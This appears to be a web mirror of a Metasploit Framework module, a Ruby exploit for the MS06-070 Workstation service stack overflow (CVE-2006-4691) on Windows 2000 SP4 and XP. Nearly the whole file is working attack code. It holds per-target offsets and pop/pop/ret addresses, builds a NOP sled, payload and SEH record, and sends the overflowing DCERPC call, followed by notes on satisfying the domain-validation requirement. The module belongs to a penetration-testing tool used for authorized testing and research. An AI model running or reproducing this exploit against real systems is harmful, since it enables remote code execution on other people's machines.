Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/smb/ms06_070_wkssvc.rb
19515 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ManualRanking # Requires valid/working DOMAIN + DC

8


9
  include Msf::Exploit::Remote::DCERPC

10
  include Msf::Exploit::Remote::SMB::Client

11
  include Msf::Exploit::Seh

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name' => 'MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow',

18
        'Description' => %q{

19
          This module exploits a stack buffer overflow in the NetApi32 NetpManageIPCConnect

20
          function using the Workstation service in Windows 2000 SP4 and Windows XP SP2.

21


22
          In order to exploit this vulnerability, you must specify the name of a

23
          valid Windows DOMAIN. It may be possible to satisfy this condition by using

24
          a custom DNS and LDAP setup, however that method is not covered here.

25


26
          Although Windows XP SP2 is vulnerable, Microsoft reports that Administrator

27
          credentials are required to reach the vulnerable code. Windows XP SP1 only

28
          requires valid user credentials. Also, testing shows that a machine already

29
          joined to a domain is not exploitable.

30
        },

31
        'Author' => [

32
          'jduck'

33
        ],

34
        'License' => MSF_LICENSE,

35
        'References' => [

36
          [ 'CVE', '2006-4691' ],

37
          [ 'OSVDB', '30263' ],

38
          [ 'BID', '20985' ],

39
          [ 'MSB', 'MS06-070' ],

40
        ],

41
        'DefaultOptions' => {

42
          'EXITFUNC' => 'thread',

43
        },

44
        'Privileged' => true,

45
        'Payload' => {

46
          'Space' => 1024,

47
          'BadChars' => "\x00",

48
          'StackAdjustment' => -3500,

49
        },

50
        'Platform' => 'win',

51
        'Targets' => [

52
          [ 'Automatic Targetting', {} ],

53
          [

54
            'Windows 2000 SP4',

55
            {

56
              'Offset' => (1058 * 2),

57
              'Ret' => 0x75022ac4 # pop/pop/ret in ws2help.dll

58
            }

59
          ],

60
          [

61
            'Windows XP SP0/SP1',

62
            {

63
              'Offset' => (1290 * 2),

64
              'Ret' => 0x71ab21cd # pop/pop/ret in ws2_32.dll

65
            }

66
          ]

67
        ],

68
        'DefaultTarget' => 0,

69
        'DisclosureDate' => '2006-11-14',

70
        'Notes' => {

71
          'Reliability' => UNKNOWN_RELIABILITY,

72
          'Stability' => UNKNOWN_STABILITY,

73
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

74
        }

75
      )

76
    )

77


78
    register_options(

79
      [

80
        OptString.new('SMBPIPE', [ true, "The pipe name to use.", 'WKSSVC']),

81
        # NOTE: a valid domain name is required. See description.

82
        OptString.new('DOMAIN', [ true, "The domain to validate prior to joining it."])

83
      ]

84
    )

85


86
    deregister_options('SMB::ProtocolVersion')

87
  end

88


89
  def exploit

90
    connect(versions: [1])

91
    smb_login()

92


93
    mytarget = nil

94
    if (target.name =~ /Automatic/)

95
      case smb_peer_os()

96
      when 'Windows 5.0'

97
        print_status("Detected a Windows 2000 target")

98
        mytarget = targets[1]

99
      when 'Windows 5.1'

100
        begin

101
          smb_create("\\SRVSVC")

102
          print_status("Detected a Windows XP SP0/SP1 target")

103
        rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e

104
          if (e.error_code == 0xc0000022)

105
            fail_with(Failure::Unknown, "Windows XP SP2 requires Administrator privileges!")

106
          end

107
          print_status("Detected a Windows XP target (unknown patch level)")

108
        end

109
        mytarget = targets[2]

110
      else

111
        fail_with(Failure::NoTarget, "No target detected for #{smb_peer_os()}/#{smb_peer_lm()}...")

112
      end

113
    else

114
      mytarget = target

115
    end

116


117
    handle = dcerpc_handle(

118
      '6bffd098-a112-3610-9833-46c3f87e345a', '1.0',

119
      'ncacn_np', ["\\#{datastore['SMBPIPE']}"]

120
    )

121


122
    print_status("Binding to #{handle} ...")

123
    dcerpc_bind(handle)

124
    print_status("Bound to #{handle} ...")

125


126
    print_status("Building the stub data...")

127


128
    distance = mytarget['Offset']

129
    hostname = make_nops(distance - payload.encoded.length)

130
    hostname << payload.encoded

131
    hostname << generate_seh_record(mytarget.ret)

132
    hostname << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string

133


134
    name = datastore['DOMAIN'] + "\\\\L"

135
    name = Rex::Text.to_unicode(name)

136
    name << hostname

137
    name << Rex::Text.to_unicode(rand_text_alphanumeric(1000) * 3)

138
    name << "\x00\x00"

139


140
    stub =

141
      NDR.uwstring("\\\\#{datastore['RHOST']}") +

142
      NDR.UnicodeConformantVaryingStringPreBuilt(name) +

143
      NDR.uwstring("") +

144
      NDR.uwstring("") +

145
      NDR.long(0) +

146
      NDR.long(1)

147


148
    print_status("Calling the vulnerable function...")

149


150
    begin

151
      dcerpc.call(0x16, stub)

152
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse

153
    rescue => e

154
      if e.to_s !~ /STATUS_PIPE_DISCONNECTED/

155
        raise e

156
      end

157
    end

158


159
    # Cleanup

160
    handler

161
    disconnect

162
  end

163
end

164


165
=begin

166


167
The IDL for NetrJoinDomain2 looks like this:

168
long _NetrJoinDomain2@28 (

169
  [in][unique][string] wchar_t * arg_1,

170
  [in][string] wchar_t * arg_2,

171
  [in][unique][string] wchar_t * arg_3,

172
  [in][unique][string] wchar_t * arg_4,

173
  [in][unique] struct_C * arg_5,

174
  [in] long arg_6

175
  );

176


177


178
1. --> dns server - query for IN.SRV _ldap._tcp.dc._msdcs.DOMAIN

179
2. <-- dns server - response including answer and additional record.

180
                    answer: whateverserver.DOMAIN priority 0 / weight 100 / port 389

181
              additional: IN.A address of whateverserver.DOMAIN

182
3. --> ldap server - baseObject query with filter/attributes:

183
                   - filter: (&(&(DnsDomain=DOMAIN)(Host=TARGETHOSTNAME))(NtVer=06:00:00:00))

184
             - attributes: AttributeDescriptionList: NetLogon

185
4. <-- ldap server - searchResDone success, attributes data

186
                   - PartialAttributeList netlogon - 1 item

187
               - type 23, flags 0x1fd, domain GUID,

188
              forest, domain, hostname, netbios domain, netbios hostname,

189
              user, site, client site, version, lmtoken, nttoken

190
5. validated.

191


192
=end

193


194